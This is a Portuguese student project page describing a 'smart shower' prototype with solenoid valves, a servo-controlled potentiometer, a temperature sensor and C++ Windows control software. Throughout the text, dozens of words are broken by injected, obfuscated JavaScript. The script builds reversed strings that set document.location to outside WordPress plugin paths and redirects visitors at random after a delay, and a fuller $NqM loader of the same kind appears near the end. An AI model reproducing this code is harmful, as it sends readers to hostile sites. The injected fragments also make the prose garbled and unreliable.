Chuveiro Inteligente

Este projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tenta manipular as adversidades de temperatura e vazão de água durante um banho. Buscando oferecer confortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to e economia.

VÍDEO:

CONTEÚDO:
O projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to “Chuveiro Inteligente” teve como objetivo, o aprendizado sobre pesquisas, documentações, cronogramas, apresentações, ou seja, tudo que envolve um adequado gerenciamentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to de projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, assim como utilizar conhecimentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos recebidos em sala de aula já em aplicações mais próximas da engenharia propriamente dita, como a utilização dos conceitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos de circuitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos elétricos e sistemas digitais para uma interpretação real das tecnologias empregadas no projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. Como circuitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos elétricos e sistemas digitais que foram exaustivamente revisadas e aplicadas durante o mesmo.
Sem relevar a oportunidade de poder desenvolver algo que aumente o confortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to do usuário durante o banho. Haveria economia de água e energia, se o usuário consegui-se atingir a temperatura de banho que ele julga-se adequada mais rápido, dispensado aquele clássico ritual de “calibração” da temperatura e quantidade toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todas vez antes do banho, que em alguns casos é relativamente demorada, ou seja, fosse capaz de autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaticamente regular temperatura com base nas leituras de temperaturas previamente escolhidas pelo usuário.

MATERIAIS:
O projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to foi constituído de três fases: HARDWARE, ESTRUTURA HIDRÁULICA, PROGRAMAÇÃO.
A parte do Hardware foram utilizadas para implementar a comunicação e controle via software entre o computador e as válvulas, sensor e motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor. Foi utilizado primariamente, para realizar a comunicação computador<->módulos, o conversor RS 232-TTL que utiliza uma entrada serial pra comunicação com o computador. Para o controle das válvulas, sensor e motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor servo foram utilizados módulos específicos (M2 e M1). Todos módulos foram construídos através dos esquemáticos disponibilizados pelo professor Afonso. Foram ainda utilizados etapas de potência para garantir a correta voltagem no sistema e um transformador de 110V para 15V que serve como fonte de alimentação elétrica para o sistema. As placas e a fonte foram acomodados em uma caixa de plástico própria para circuitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos para melhor organização, transporte e apresentação do sistema.
A estrutura hidráulica consiste em uma placa de madeira(MDF) em formatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to de U que serve como base principal para o projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. Outra placa de madeira, retirada da placa inicial, foi presa à base, em posição vertical, para dar suporte ao chuveiro. Toda a parte hidráulica, válvulas de controle, caixa com as placas de circuitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to foi anexada à essa estrutura.
 
 
 
Como ilustra a fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, foi utilizada uma tubulação padrão de PVC em conjuntoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to com mangueiras de silicone para melhor visualização do movimentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to da água. O sistema recebe a alimentação de água por meio de uma toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torneira normal com vazão suficiente para ligar o
chuveiro. Por meio de uma mangueira essa água chega a parte hidráulica do projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, em uma conexão em formatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to T a água é dívida em duas tubulações, uma para cada válvula, depois de passar pelas válvulas a água chega a outra conexão em T que une as duas tubulações. Essa última tubulação sobe pela placa vertical da base, chegando ao toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topo da placa foi colocada uma curva de 90° (joelho) de PVC para o cano ficar na posição horizontal e servir de fixação para o chuveiro eletrônico.
O chuveiro utilizado foi um chuveiro eletrônico da marca Zagonel, que utiliza um controle de temperatura manual por meio de um potenciômetro, este utiliza uma fiação para se ligar ao chuveiro, podendo assim ser fixado em qualquer posição próxima ao chuveiro. Por ter essa facilidade de mobilidade do potenciômetro este chuveiro foi escolhido para o projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to.
Duas válvulas solenóides (ou eletro-válvulas) foram utilizadas para o controle da vazão da água. Essas válvulas operam de modo simples, elas em seu interior contém um eletro-imã fixo, um pedaço de metal é preso a uma parte móvel que corre por dentro de um pequeno vão dentro da válvula. Se a válvula é alimentada com a voltagem correta, esse eletro-imã entra em ação atraindo o pedaço de metal, puxando assim juntamente a parte plástica liberando assim passagem de água. Se não existir a alimentação elétrica, o pedaço de metal não é atraído e por meio de uma mola, a válvula permanece fechada. As válvulas foram fixadas na tubulação, servindo esta como suporte, de forma que as válvulas poderiam ser utilizadas em conjuntoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ou separadas. A tubulação antes e depois de cada válvula foi substituída por pedaços de mangueira de silicone transparente para facilitar a conexão com as válvulas e visualização da passagem de água. A primeira válvula ,de material metálico, foi retirada de um sistema de ar de um caminhão. Utiliza 12V para operar. Pela tubulação ser de PVC e a válvula ser metálica houve certa dificuldade em adaptar ela ao conjuntoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. A segunda válvula, de plástico e suporte em metal, foi retirada de uma máquina de lavar. Ela opera com 110V, necessitando assim de uma alimentação direta da rede elétrica. Para controlá-la foi utilizado um relé que é acionado com 12V, podendo este ser integrado facilmente aos circuitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos previamente discutidos.
Para o controle de temperatura foi utilizado o potenciômetro original do chuveiro, este foi ligado à um motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor servo e ambos foram presos com madeira à base principal. O potenciômetro consiste em uma pequena caixa, ligado ao chuveiro por um cabo elétrico, com um dispositivo que ao ser girado modifica sua resistência deixando passar mais ou menos corrente, ou seja, ao ser girado modifica a potência que o chuveiro tem para aquecer a água, mudando assim a temperatura da água que o chuveiro fornece. Para controlar este dispositivo foi utilizado um motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor servo. O motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor usado foi obtido do sistema de controle de polarização de uma antena parabólica. Este motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor tem como característica o controle preciso de seus movimentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos, ideal para controlar um pequeno dispositivo como o
potenciômetro. Ele funciona com um controle vindo do módulo e gira de acordo com o comando fornecido, controlando assim o potenciômetro.
Para verificar a temperatura, foi utilizado um sensor acoplado ao chuveiro. Este sensor é ligado ao circuitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to para leitura da temperatura da água no chuveiro.
Todo o controle é feitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to via software ligado ao sistema pelo módulo de conversão RS 232-TTL discutido previamente. O computador foi ligado ao sistema por um conversor USB-Serial pela comodidade que existe em usar a porta USB. O software foi desenvolvido em plataforma Windows, utilizando o programa Visual Studio, ambos da empresa Microsoft. A linguagem de programação utilizada foi o C++. Foi utilizado ainda o Windows Form para facilitar o geração da parte gráfica do programa.

CONCLUSÃO:
Esse foi um projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to muitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to fértil. Digo fértil porque toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toda a dedicação que foi investida no trabalho, trouxe frutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos de valorosos aprendizados de hidráulica, eletrônica, programação, maquetaria e organização para desenvolver grandes projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos. A oportunidade de desenvolver essa idéia, embora precisássemos de mais tempo para conseguir aprimorar toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todos os conceitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos que a envolvem de maneira mais aprofundada e otimizada, foi gratificante e proporcionou um amadurecimentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to dos integrantes do grupo além do esperado.
Algumas características do nosso projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to poderiam ser melhor implementadas, se houvesse mais tempo para tal. Um bom exemplo seria o maior quantidade de níveis de vazão, programamos somente 3 níveis, seria algo como “pouco”, “médio” e “bastante”. Seria mais interessante ter 10 níveis, traria maior confortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a escolhas de vazão. Outro pontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to que poderia ser otimizado seria um controle e um métoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todo para aquecer a água até a temperatura desejada mais rápida, desperdiçaria menos água enquantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to espera-se a transição da escolha.
Todo o grupo espera que se alguém resolva dar continuidade ao nosso projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, que comece focando formas mais inteligentes de disposição das peças, a fim de economizar espaço. Pesquise e manuseie um catálogo de peças hidráulicas, para adquirir valorizada familiaridade com o mesmo. Isso poupa tempo, ajuda a enxergar soluções mais eficazes de encanamentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to e a economizar não comprando sobressalentes.
Ressaltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to sobre a importância das peças hidráulicas, pois foi a dificuldade principal do grupo, como toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todos eram da mesma área, ninguém tinha a familiaridade necessária com a área, e isso trouxe dificuldades imediatas como um toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todo.
É um projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to extremamente interessante, de uso cotidiano, que traria perceptíveis melhorias para as pessoas de um modo geral. Foi uma experiência enobrecedora ver o quantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to de trabalho está por fazer para melhorar as condições da nossa sociedade, e esse foi só um deles.

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tores>AUTORES:
– Carlos Robertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Remenche Junior
– Rafael Antoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonio Grosko
– Denis Reimche Ott

CONTATO:
– sossegadorafa@hotmail.com
– carlos.remenche@gmail.com

DOCUMENTAÇÃO:
Chuveiro_Inteligente.pdf